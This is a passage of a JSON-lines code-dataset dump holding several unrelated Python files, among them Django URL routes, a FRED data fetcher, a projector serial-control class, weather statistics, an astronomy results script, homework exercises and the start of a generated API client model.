end-------------------')\n\n\n\n\n\n\n\n","sub_path":"debugHere/forTest/RegularExpression.py","file_name":"RegularExpression.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"486068684","text":"from django.urls import path\nfrom . import views\n\napp_name = 'post-api'\n\n\nurlpatterns = [\n path('post/list/', views.PostListAPIView.as_view(), name='list'),\n path('post/detail//', views.PostRetrieveUpdateDestroyAPIView.as_view(), name='detail'),\n path('post/create/', views.PostCreateAPIView.as_view(), name='create'),\n path('user/list/', views.UserListAPIView.as_view(), name='user'),\n path('user/detail//', views.UserRetrieveAPIView.as_view(), name='user-detail'),\n path('comment-create/', views.CommentCreateAPIView.as_view(), name='comment_create'),\n]","sub_path":"post/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563922343","text":"import requests\nimport datetime # stdlib\nimport tempfile #stlib\nimport pandas as pd\n\n# get_fred() defaults\ntoday = datetime.datetime.now().strftime('%Y-%m-%d')\nstart_date_default = (pd.to_datetime(today) - pd.DateOffset(years = 5)).strftime('%Y-%m-%d')\nend_date_default = today\n\ndef get_fred(fred_id, start_date = start_date_default, end_date = end_date_default):\n \"\"\"\n Fetch time-series data from Federal Reserve Economic Data (FRED), provided\n by the Federal Reserve Bank of St. Louis.\n\n :param fred_id: ID string for FRED series\n\n :param start_date: Start date for FRED series, as a string in the format\n YYYY-MM-DD. Defaults to five years prior to the date\n called.\n\n :param end_date: End date for FRED series. Defaults to the date called.\n\n :returns: A pandas `DataFrame`\n \"\"\"\n # Shitty way around not asking for an API key, since returned data is raw\n # text. With a key, change this to GET from the API endpoint\n try:\n [datetime.datetime.strptime(d, '%Y-%m-%d') for d in [start_date, end_date]]\n except ValueError:\n raise ValueError('Bad date format! Must be YYYY-MM-DD')\n \n url = 'https://fred.stlouisfed.org/graph/fredgraph.csv'\n r = requests.get(f'{url}?id={fred_id}&cosd={start_date}&coed={end_date}')\n\n with tempfile.NamedTemporaryFile('w', delete = False) as f:\n f.write(r.text)\n tmpfile = f.name\n\n df = pd.read_csv(tmpfile)\n\n # Prep\n df['DATE'] = pd.to_datetime(df['DATE'])\n df['label'] = 'Actual'\n\n return df\n# end get_fred\n","sub_path":"python/fredcast/io/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"356579949","text":"#Métodos para controlar el mezclador amplificador \r\n#Ecler CA40. Serán llamadas desde\r\n#control-CA40.py\r\n\r\nfrom serial import Serial\r\n# from serial.serialutil import SerialBase\r\n\r\n# class ex320(serial.Serial,SerialBase):\r\nclass device(Serial):\r\n\r\n\tstatus_dic = {\r\n\t\t\t'device_name' : \"Mitsubishi EX320U\",\r\n\t\t\t'power_status' : \"\",\r\n\t\t\t'av_mute': \"\",\r\n\t\t\t'source' : \"\",\r\n\t\t\t'volume' : 0,\r\n\t\t\t'lamp_hours' : 0,\r\n\t\t\t'lamp_minutes' : 0,\r\n\t\t\t'picturesetting': \"\",\r\n\t\t\t'contrast': 0,\r\n\t\t\t'brightness':0,\r\n\t\t\t'lampmode': \"\",\r\n\t\t\t'aspect': \"\"\r\n\t\t}\r\n\r\n\r\n\tdef __init__(self,ex320_port):\r\n\t\tsuper().__init__(ex320_port, timeout = 0.5)\r\n\t\t# Serial(ex320_port, timeout = 1)\r\n\r\n\t# def class_name(self):\r\n\t# \treturn self.__class__.__name__\r\n\r\n############################## CONSULTAS ############################################\r\n\r\n\r\n\tdef get_power(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vP\\r')\r\n\t\tlee = self.read_until(\"\\r\")\r\n\t\tstatus = {\r\n\t\tb'00vP0\\r': \"OFF\",\r\n\t\tb'00vP1\\r': \"ON\"\r\n\t\t}\r\n\t\tself.status_dic['power_status'] = status.get(lee, \"?\")\r\n\t\treturn self.status_dic['power_status']\r\n\r\n\tdef get_avmute(self):\r\n\t\treturn self.status_dic['av_mute']\r\n\r\n\tdef get_source(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vI\\r')\r\n\t\tlee = self.readline()\r\n\t\tsources ={\r\n\t\t\tb'00vIr1\\r': \"Computer 1\",\r\n\t\t\tb'00vIr2\\r': \"Computer 2\",\r\n\t\t\tb'00vIv1\\r': \"Video 1\",\r\n\t\t\tb'00vIv2\\r': \"S-Video\",\r\n\t\t\tb'00vId1\\r': \"HDMI\"\r\n\t\t}\r\n\t\tself.status_dic['source'] = sources.get(lee, \"?\")\r\n\t\treturn self.status_dic['source']\r\n\r\n\tdef get_volume(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00VL\\r')\r\n\t\tlee = self.readline()\r\n\t\tvol = str(lee).split(\"00VL\")[1].rstrip(\"\\\\r'\")\r\n\t\tif vol == \":N\":\r\n\t\t\tself.status_dic[\"volume\"] = 0\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\treturn str(int(vol))\r\n\r\n\tdef get_lamptime(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00vLE\\r')\r\n\t\tlee = self.readline()\r\n\t\thours = str(lee).split(\"00vLE\")[1].rstrip(\"\\\\r'\")[:4].lstrip(\"0\")\r\n\t\tminutes = str(lee).split(\"00vLE\")[1].rstrip(\"\\\\r'\")[4:]\r\n\t\tlamptime = {\r\n\t\t\t\"hours\": hours,\r\n\t\t\t\"minutes\": minutes\r\n\t\t}\r\n\t\tself.status_dic['lamp_hours'] = hours\r\n\t\tself.status_dic['lamp_minutes'] = minutes\r\n\t\treturn lamptime\r\n\r\n\tdef get_picturesetting(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00CE\\r')\r\n\t\tlee = self.readline()\r\n\t\tsetting = {\r\n\t\t\tb'00CE0\\r': \"Brightest\",\r\n\t\t\tb'00CE1\\r': \"Presentation\",\r\n\t\t\tb'00CE2\\r': \"Normal\",\r\n\t\t\tb'00CE3\\r': \"Theather\",\r\n\t\t\tb'00CE4\\r': \"User 1\",\r\n\t\t\tb'00CE5\\r': \"User 2\"\r\n\t\t}\r\n\t\tps = setting.get(lee, \"?\")\r\n\t\treturn ps\r\n\t \r\n\tdef get_contrast(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00PP\\r')\r\n\t\tlee = self.readline()\r\n\t\tcontrast = str(lee).split(\"00PP\")[1].rstrip(\"\\\\r'\")\r\n\t\tif contrast == \":N\":\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\treturn str(int(contrast))\r\n\r\n\tdef get_brightness(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00QQ\\r')\r\n\t\tlee = self.readline()\r\n\t\tbrightness = str(lee).split(\"00QQ\")[1].rstrip(\"\\\\r'\")\r\n\t\tif brightness == \":N\":\r\n\t\t\treturn \"0\"\r\n\t\telse:\r\n\t\t\treturn str(int(brightness))\r\n\r\n\tdef get_lampmode(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00LM\\r')\r\n\t\tlee = self.readline()\r\n\t\tmode ={\r\n\t\t\tb'00LM0\\r': \"Standard\",\r\n\t\t\tb'00LM1\\r': \"Low\"\r\n\t\t}\r\n\t\tlampmode = mode.get(lee, \"?\")\r\n\t\treturn lampmode\r\n\r\n\tdef get_aspect(self):\r\n\t\tself.flush()\r\n\t\tself.write(b'00SC\\r')\r\n\t\tlee = self.readline()\r\n\t\taspect_ratio ={\r\n\t\t\tb'00SC0\\r': \"Auto\",\r\n\t\t\tb'00SC1\\r': \"Real\",\r\n\t\t\tb'00SC2\\r': \"4:3\",\r\n\t\t\tb'00SC3\\r': \"16:9\"\r\n\t\t}\r\n\t\taspect = aspect_ratio.get(lee, \"?\")\r\n\t\treturn aspect\r\n\r\n\r\n\tdef get_status(self):\r\n\t\tself.status_dic['power_status'] = self.get_power()\r\n\t\tself.status_dic['av_status'] = self.get_avmute()\r\n\t\tself.status_dic['source'] = self.get_source()\r\n\t\tself.status_dic['vol'] = self.get_volume()\r\n\t\tself.status_dic['lamp_hours'] = self.get_lamptime()[\"hours\"]\r\n\t\tself.status_dic['lamp_minutes'] = self.get_lamptime()[\"minutes\"]\r\n\t\tself.status_dic['lampmode'] = self.get_lampmode()\r\n\t\tself.status_dic['picturesetting'] = self.get_picturesetting()\r\n\t\tself.status_dic['contrast'] = self.get_contrast()\r\n\t\tself.status_dic['brightness'] = self.get_brightness()\r\n\t\tself.status_dic['aspect'] = self.get_aspect()\r\n\t\treturn self.status_dic\r\n\r\n\tdef get_status_dic(self):\r\n\t\treturn self.status_dic\r\n\r\n########### Menú de opciones\r\n\r\n\tdef menu(self):\r\n\t\tprint(\"----------------------------------------\")\r\n\t\tprint(\"Control de selfector Mitsubishi EX320\")\r\n\t\tprint(\"----------------------------------------\")\r\n\t\tprint(\"-----------------------\")\r\n\t\tprint(\" Estado encendido: \" + get_power_status())\r\n\t\tlamp = lamptime()\r\n\t\tprint(\" Horas de lámpara: \" + lamp[0] + \" horas, \" + lamp[1] +\" minutos.\")\r\n\t\tprint(\" Fuente de vídeo: \" + get_source())\r\n\t\tprint(\" Volumen altavoz: \" + get_vol())\r\n\t\tprint(\" Configuración de imagen: \" + get_picturesetting())\r\n\t\tprint(\" Contraste: \" + get_contrast())\r\n\t\tprint(\" Brillo: \" + get_brightness())\r\n\t\tprint(\" Modo de lámpara: \" + get_lampmode())\r\n\t\tprint(\" Relación de aspecto: \" + get_aspect())\r\n\t\tprint(\"-----------------------\")\r\n\t\tprint(\"1.Enciende\")\r\n\t\tprint(\"2.Apaga\")\r\n\t\tprint(\"3.AV Mute ON\")\r\n\t\tprint(\"4.AV Mute OFF\")\r\n\t\tprint(\"5.Source Computer 1\")\r\n\t\tprint(\"6.Source Computer 2\")\r\n\t\tprint(\"7.Source video 1\")\r\n\t\tprint(\"8.Source S-Video\")\r\n\t\tprint(\"9.Source HDMI\")\r\n\t\tprint(\"q.Vol +\")\r\n\t\tprint(\"w.Vol -\")\r\n\t\tprint(\"x.Salir\")\r\n\r\n\r\n\r\n######################## OPERACIONES BÁSICAS ################################\r\n\r\n\tdef set_power(self, ON_OFF):\r\n\t\tself.flush()\r\n\t\tpower ={\r\n\t\t\t\"ON\": b'00!\\r',\r\n\t\t\t\"OFF\": b'00\"\\r'\r\n\t\t}\r\n\t\tenvio = power.get(ON_OFF)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"power_status\"] = ON_OFF\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_avmute(self, ON_OFF):\r\n\t\tself.flush()\r\n\t\tmute ={\r\n\t\t\t\"ON\": b'00MUTE1\\r',\r\n\t\t\t\"OFF\": b'00MUTE0\\r'\r\n\t\t}\r\n\t\tenvio = mute.get(ON_OFF)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"av_mute\"] = ON_OFF\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\t\r\n\t# def av_mute_on(self):\r\n\t# \tself.flush()\r\n\t# \tself.write(b'00MUTE1\\r')\r\n\t# \tlee = self.readline()\r\n\r\n\t# def av_mute_off(self):\r\n\t# \tself.flush()\r\n\t# \tself.write(b'00MUTE0\\r')\r\n\t# \tlee = self.readline()\r\n\t# \tprint(\"av_mute_off\")\r\n\r\n\tdef set_source(self, source):\r\n\t\tself.flush()\r\n\t\tsources ={\r\n\t\t\t\"Computer 1\": b'00_r1\\r',\r\n\t\t\t\"Computer 2\": b'00_r2\\r',\r\n\t\t\t\"Video 1\": b'00_v1\\r',\r\n\t\t\t\"S-Video\": b'00_v2\\r',\r\n\t\t\t\"HDMI\": b'00_d1\\r'\r\n\t\t}\r\n\t\tenvio = sources.get(source)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"source\"] = source\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n######### Ajuste de imagen\r\n\tdef set_picturesetting(self, mode):\r\n\t\tself.flush()\r\n\t\tsetting ={\r\n\t\t\t\"Brightest\": b'00CE0\\r',\r\n\t\t\t\"Presentation\": b'00CE1\\r', \r\n\t\t\t\"Normal\": b'00CE2\\r',\r\n\t\t\t\"Theather\": b'00CE3\\r', \r\n\t\t\t\"User1\": b'00CE4\\r',\r\n\t\t\t\"User2\": b'00CE5\\r' \r\n\t\t}\r\n\t\tenvio = setting.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"picturesetting\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_contrast(self, value):\r\n\t\tself.flush()\r\n\t\tif int(value) > 0:\r\n\t\t\tvalue_ok = (\"+\" + value).zfill(3)\r\n\t\telif int(value) < 0:\r\n\t\t\tvalue_ok = value.zfill(3)\r\n\t\telse:\r\n\t\t\tvalue_ok = \"000\"\r\n\t\tenvio = \"00PP\"+ value_ok + \"\\r\"\r\n\t\ttry:\r\n\t\t\tself.write(envio.encode())\r\n\t\t\tself.status_dic[\"contrast\"] = value\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\r\n\tdef set_brightness(self, value):\r\n\t\tself.flush()\r\n\t\tenvio = \"00QQ\" + value.zfill(3) + \"\\r\"\r\n\t\ttry:\r\n\t\t\tself.write(envio.encode())\r\n\t\t\tself.status_dic[\"brightness\"] = value\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\r\n\tdef set_lampmode(self, mode):\r\n\t\tself.flush()\r\n\t\tself.write(b'00LM\\r')\r\n\t\tlee = self.readline()\r\n\t\tmodes ={\r\n\t\t\t\"Standard\": b'00LM0\\r',\r\n\t\t\t\"Low\": b'00LM1\\r'\r\n\t\t}\r\n\t\tenvio = modes.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"lampmode\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n\tdef set_aspect(self, mode):\r\n\t\tself.flush()\r\n\t\taspect ={\r\n\t\t\t\"Auto\": b'00SC0\\r',\r\n\t\t\t\"Real\": b'00SC1\\r',\r\n\t\t\t\"4:3\": b'00SC2\\r',\r\n\t\t\t\"16:9\": b'00SC3\\r'\r\n\t\t}\r\n\t\tenvio = aspect.get(mode)\r\n\t\ttry:\r\n\t\t\tself.write(envio)\r\n\t\t\tself.status_dic[\"aspect\"] = mode\r\n\t\t\treturn True\r\n\t\texcept:\r\n\t\t\treturn False\r\n\r\n########## Ajuste de audio\r\n\r\n\tdef set_volume(self,up_down):\r\n\t\tself.flush()\r\n\t\tif up_down == \"up\":\r\n\t\t\ttry:\r\n\t\t\t\tself.write(b'00r06\\r')\r\n\t\t\t\tvol = self.get_volume()\r\n\t\t\t\tif vol < 10:\r\n\t\t\t\t\tvol+=1\r\n\t\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\t\treturn True\r\n\t\t\texcept:\r\n\t\t\t\treturn False\r\n\t\telif up_down == \"down\":\r\n\t\t\ttry:\r\n\t\t\t\tself.write(b'00r07\\r')\r\n\t\t\t\tvol = self.get_volume()\r\n\t\t\t\tif vol > 0:\r\n\t\t\t\t\tvol-=1\r\n\t\t\t\tself.status_dic[\"volume\"] = vol\r\n\t\t\t\treturn True\r\n\t\t\texcept:\r\n\t\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn False","sub_path":"aplicacion/vp_ex320u.py","file_name":"vp_ex320u.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"49067409","text":"def get_weather_stats():\n #import packages\n import pandas as pd\n import numpy as np\n import os\n from python_pkg import python_udf as udf\n import time\n import datetime\n #import project modules\n try:\n os.chdir('C:/Users/Joe/Projects/perfect_city')\n except:\n os.chdir('/home/jchristo/Projects/perfect_city/')\n import data_setup_functions\n\n\n # =============================================================================\n # Data Cleaning\n # =============================================================================\n #Read in data\n df = pd.read_csv('https://raw.githubusercontent.com/jchristo12/perfect_city/master/data_files/weather_data.csv')\n\n #total days\n total_days = len(df['date'].unique())\n\n #fix leading zero problem\n df['location'] = df['location'].map(lambda x: str(x).zfill(7))\n\n #fix NaN for precip cols\n #replace NaN in precipAccumulation with zero\n df.loc[df['precipAccumulation'].isna(), 'precipAccumulation'] = 0\n #replace NaN in precipType with 'None'\n df.loc[df['precipType'].isna(), 'precipType'] = 'none'\n\n #Replace unicode date with datetime\n df['new_date'] = df['date'].map(lambda x: datetime.datetime.fromtimestamp(x))\n #get the year and month\n df['year'] = df['new_date'].map(lambda x: x.year)\n df['month'] = df['new_date'].map(lambda x: x.month)\n #convert year and month columns to categories\n df = df.astype({'year': 'category', 'month': 'category'})\n\n #Create dict of seasons\n seasons = {'winter': [12,1,2],\n 'spring': [3,4,5],\n 'summer': [6,7,8],\n 'fall': [9,10,11]}\n #flip the dict\n seasons_alt = udf.dict_key_value_flip(seasons)\n #create a feature that is the season\n df['season'] = df['month'].apply(lambda x: seasons_alt[x])\n\n #create length of data feature and drop orig columns\n df['day_length'] = (df['sunsetTime'] - df['sunriseTime']) / 3600\n df.drop(['sunriseTime', 'sunsetTime'], axis=1, inplace=True)\n\n\n #Summarize the features\n stats = ['mean', 'std']\n\n #Get the temperatures for summer and winter\n #store only winter and summer data\n summer_winter_df = df[(df['season'] == 'winter') | (df['season'] == 'summer')]\n\n seas_temps = summer_winter_df.groupby(by=['location', 'season']).agg({'temperatureHigh': 'mean',\n 'temperatureLow': 'mean'})\n seas_temps_unstack = seas_temps.unstack(level=1)\n seas_temps_unstack.columns = seas_temps_unstack.columns.droplevel(0)\n #seas_temps_unstack[('temperatureHigh', 'summer')]\n\n\n #Number of precip days\n df['precipBinary'] = pd.Series(np.where(df['precipType'] != 'none', 1, 0))\n precip_days_df = df.groupby(by='location').agg({'precipBinary': 'sum'}) / total_days\n\n #Snow levels\n snow_rank = df[df['precipType'] == 'snow'].groupby(by=['location'], sort=False).agg({'precipAccumulation': 'sum'}).rank(method='min', pct=True)\n\n #Number of snow days\n df['snowBinary'] = pd.Series(np.where((df['precipType'] == 'snow') & (df['precipAccumulation'] != 0), 1, 0))\n snow_days_df = df.groupby(by='location').agg({'snowBinary': 'sum'}) / total_days\n\n df['highUV'] = pd.Series(np.where(df['uvIndex'] > 6, 1, 0))\n high_UV_df = df.groupby(by='location').agg({'highUV': 'sum'}) / total_days\n #high_UV_df.sort_values(by='highUV', ascending=False)\n\n #Average summer day length\n day_length_df = df.groupby(by=['location', 'season']).agg({'day_length': 'mean'}).unstack(level=1)\n #drop multilevel column\n day_length_df.columns = day_length_df.columns.droplevel(0)\n\n #Cloudy percent\n df['sunnyBinary'] = np.where(df['cloudCover'] >= 0.5, 0, 1)\n sunny_df = df.groupby(by=['location']).agg({'sunnyBinary': 'sum'}) / total_days\n\n\n #merge all data together\n all_weather_stats = seas_temps_unstack.merge(precip_days_df, how='left', right_index=True, left_index=True).\\\n merge(snow_rank, how='left', right_index=True, left_index=True).\\\n merge(snow_days_df, how='left', right_index=True, left_index=True).\\\n merge(high_UV_df, how='left', right_index=True, left_index=True).\\\n merge(day_length_df, how='left', right_index=True, left_index=True).\\\n merge(sunny_df, how='left', right_index=True, left_index=True)\n\n #rename columns in final df\n all_weather_stats.columns = ['summerHigh', 'winterHigh', 'summerLow', 'winterLow', 'rainyDays', 'snowAmtRank', 'snowyDays', 'highUV',\n 'fallDayLength', 'springDayLength', 'summerDayLength', 'winterDayLength', 'sunnyDays']\n\n #fix missing data\n all_weather_stats['snowAmtRank'].fillna(0, inplace=True)\n\n #prep for use in main module\n all_weather_stats = all_weather_stats.reset_index()\n all_weather_stats.rename(columns={'location': 'id'}, inplace=True)\n\n return all_weather_stats\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"data_pipelines/weather_analysis.py","file_name":"weather_analysis.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191658317","text":"\nimport os\nfrom glob import glob\nimport sys\nsys.path.insert(0, '../data/')\nimport matplotlib.pyplot as plt\nfrom datacleaner import LightCurve\nfrom results import BestLightCurve, MCMCResults, plot_star\nfrom cleanfit import T14b2aRsi\nimport batman\nimport numpy as np\n\n#results_dir = '/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window229/run002/'\n\nwindow_ind, run_ind = sys.argv[-2:]\n# results_dir = ('/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window{0:03d}/run{1:03d}/'\n#results_dir = ('/local/tmp/osg/hat11-osg/window{0:03d}/run{1:03d}/'\n#results_dir = ('/local/tmp/osg/hat11-osg/window{0:03d}/run{1:03d}/'\nresults_dir = ('/local/tmp/osg/tmp/hat11-osg/window{0:03d}/run{1:03d}/'\n .format(int(window_ind), int(run_ind)))\n#if not os.path.exists(results_dir):\n\nprint('Results from: {0}'.format(results_dir))\n#results_dir = '/astro/store/scratch/tmp/bmmorris/stsp/kepler17/window101/run009/'\n#results_dir = os.path.abspath('../condor/tmp/')\n\nfiles_in_dir = glob(os.path.join(results_dir, '*.txt'))\n\nfor output_file in files_in_dir:\n if output_file.endswith('_errstsp.txt'):\n error_path = output_file\n elif output_file.endswith('_finalparam.txt'):\n final_params_path = output_file\n elif output_file.endswith('_lcbest.txt'):\n best_lc_path = output_file\n elif output_file.endswith('_mcmc.txt'):\n mcmc_path = output_file\n elif output_file.endswith('_parambest.txt'):\n\n best_params_path = output_file\n\nwindow_dir = os.sep.join(results_dir.split(os.sep)[:-2])\nmcmc_paths = glob(window_dir + '/run???/*_mcmc.txt')\n\ntry:\n print(best_lc_path)\nexcept NameError:\n raise ValueError(\"{0} doesn't exist.\".format(results_dir))\n\n\ndef hat11_params():\n from hat11 import planet_properties, stellar_properties\n params = batman.TransitParams()\n params.t0 = planet_properties['first_mid_transit_time'] #time of inferior conjunction\n params.per = planet_properties['period'] #orbital period\n params.rp = planet_properties['transit_depth'] #planet radius (in units of stellar radii)\n b = planet_properties[\"impact_parameter\"]\n #inclination = 88.94560#np.arccos(b/params.a)\n params.inc = planet_properties['inclination'] #orbital inclination (in degrees)\n params.duration = planet_properties['transit_duration_days']\n\n ecosw = planet_properties['ecosw']\n esinw = planet_properties['esinw']\n eccentricity = np.sqrt(ecosw**2 + esinw**2)\n omega = np.degrees(np.arccos(ecosw/eccentricity))\n\n a, _ = T14b2aRsi(params.per, params.duration, b, params.rp, eccentricity, omega)\n\n params.a = a #semi-major axis (in units of stellar radii)\n\n params.ecc = eccentricity #eccentricity\n params.w = omega #longitude of periastron (in degrees)\n params.u = map(float, stellar_properties['four_param_limb_darkening'].split(' ')) #limb darkening coefficients\n params.limb_dark = \"nonlinear\" #limb darkening model\n return params\n\ntransit_params = hat11_params()#get_basic_kepler17_params()\nblc = BestLightCurve(best_lc_path, transit_params=transit_params)\nblc.plot_whole_lc()\n#blc.plot_transits()\n#plt.show()\n\nmcmc = MCMCResults(mcmc_paths)\nprint('Acceptance rate: {0}'.format(str(mcmc.acceptance_rates)))\nmcmc.plot_chi2()\nmcmc.plot_chains()\n#mcmc.plot_star()\n#mcmc.plot_corner()\n#mcmc.plot_each_spot()\nplt.show()\n","sub_path":"sun_inactive/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"493303409","text":"## COMP1730/6730 S2 2018 - Homework 5\n# Submission is due 9am, Monday the 1st of October, 2018.\n\n## YOUR ANU ID: u6633756\n## YOUR NAME: Junming Zhao\n\n## Implement the function interpolate below.\n## (The statement \"pass\" is just a placeholder that does nothing: you\n## should replace it.)\n## You can define other functions if it helps you decompose the problem\n## and write a better organised and/or more readable solution.\n\n\ndef interpolate(x, y, x_test):\n '''Computes the linear interpolation of an unknown function with corresponding points in two sequences at a new point.'''\n x_low = findx(x, x_test)\n x_high = x[x.index(x_low) + 1]\n y_low = y[x.index(x_low)]\n y_high = y[x.index(x_high)]\n k = (y_high - y_low) / (x_high - x_low)\n b = y_low - k * x_low\n y_test = k * x_test + b\n return y_test\n\n\ndef findx(x, x_test):\n '''Find x_below of x_test in a sequence.'''\n for xi in x:\n if xi <= x_test <= x[x.index(xi) + 1]:\n return xi\n\n\n## REMEMBER THAT THIS FILE (WHEN YOU SUBMIT IT) MUST NOT CONTAIN ANYTHING\n## OTHER THAN YOUR FUNCTION DEFINITION AND COMMENTS. You can (and should)\n## use docstrings to document your functions, but a docstring should only\n## be used inside a function definition, an then only at the very beginning\n## of the function suite. Everywhere else you should use comments.\n","sub_path":"homeworks/homework5/homework5.py","file_name":"homework5.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"269167309","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n \nclass creatTree:#先序遍历创建二叉树\n def __init__(self, arr):\n self.arr = arr\n self.root = None\n self.creatXian(0,None)\n def creatXian(self, k, Node):\n if k == 0:\n self.root = TreeNode(self.arr[k])\n self.creatXian(k+1,self.root)\n else:\n #Node.left\n if self.arr[k] is None:\n Node.left = None\n #Node.right\n if self.arr[k+1] is None:\n Node.right = None\n return k+1\n else:\n Node.right = TreeNode(self.arr[k+1])\n n = self.creatXian(k+2,Node.right)\n return n\n else:\n Node.left = TreeNode(self.arr[k])\n n = self.creatXian(k+1,Node.left)\n\n #Node.right\n if self.arr[n+1] is None:\n Node.right = None\n return n+1\n else:\n Node.right = TreeNode(self.arr[n+1])\n n = self.creatXian(n+2,Node.right)\n return n\n\na = creatTree([3,9,None,None,20,15,None,None,7,None,None])\nb = creatTree([3,2,1,None,None,None,4,None,None])\n'''\nclass Solution:#28ms 18.4MB\n def __init__(self, root, nums):\n self.root = root\n self.nums = nums\n self.load = []\n if self.root is not None:\n self.pathSum(self.root,[])\n\n def pathSum(self,node,arr):\n if node.left is None and node.right is None:\n if sum(arr)+node.val == self.nums:\n self.load.append(arr+[node.val])\n return\n if node.left is not None:\n self.pathSum(node.left, arr+[node.val])\n if node.right is not None:\n self.pathSum(node.right, arr+[node.val])\n'''\nclass Solution:#28ms 14.6MB\n def __init__(self, root, nums):\n self.root = root\n self.nums = nums\n self.load = []\n if self.root is not None:\n stack = [[self.root,[self.root.val]]]\n while stack:\n temp = stack.pop()\n #print(temp)\n if temp[0].left is None and temp[0].right is None:\n if sum(temp[1]) == self.nums:\n self.load.append(temp[1])\n if temp[0].left is not None:\n stack.append([temp[0].left, temp[1]+ [temp[0].left.val] ])\n if temp[0].right is not None:\n stack.append([temp[0].right, temp[1]+ [temp[0].right.val] ])\n print(self.load)\n","sub_path":"code/路径总和2.py","file_name":"路径总和2.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"197942643","text":"import csv\n\n\ndef print_schools(reader):\n schools = []\n for line in reader:\n for team in [4, 7]:\n if line[team] not in schools:\n schools.append(line[team])\n schools.sort()\n for school in schools:\n print(school)\n\n\ndef print_tournaments(reader):\n tournaments = []\n for line in reader:\n if line[1] not in tournaments:\n tournaments.append(line[1])\n tournaments.sort()\n for tournament in tournaments:\n print(tournament)\n\n\ndef main():\n rounds = open('rounds-completed.csv')\n reader = csv.reader(rounds)\n print_schools(reader)\n print_tournaments(reader)\n rounds.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cleaning/cleaning_tools.py","file_name":"cleaning_tools.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"343374466","text":"# coding: utf-8\n\n\"\"\"\n BIMData API\n\n BIMData API is a tool to interact with your models stored on BIMData’s servers. Through the API, you can manage your projects, the clouds, upload your IFC files and manage them through endpoints. # noqa: E501\n\n The version of the OpenAPI document: v1\n Contact: support@bimdata.io\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom bimdata_api_client.configuration import Configuration\n\n\nclass Invitation(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'id': 'int',\n 'client_id': 'str',\n 'redirect_uri': 'str',\n 'cloud_name': 'str',\n 'cloud_role': 'int',\n 'project_name': 'str',\n 'project_role': 'int',\n 'email': 'str',\n 'status': 'str',\n 'sender_provider_sub': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'client_id': 'client_id',\n 'redirect_uri': 'redirect_uri',\n 'cloud_name': 'cloud_name',\n 'cloud_role': 'cloud_role',\n 'project_name': 'project_name',\n 'project_role': 'project_role',\n 'email': 'email',\n 'status': 'status',\n 'sender_provider_sub': 'sender_provider_sub'\n }\n\n def __init__(self, id=None, client_id=None, redirect_uri=None, cloud_name=None, cloud_role=None, project_name=None, project_role=None, email=None, status=None, sender_provider_sub=None, local_vars_configuration=None): # noqa: E501\n \"\"\"Invitation - a model defined in OpenAPI\"\"\" # noqa: 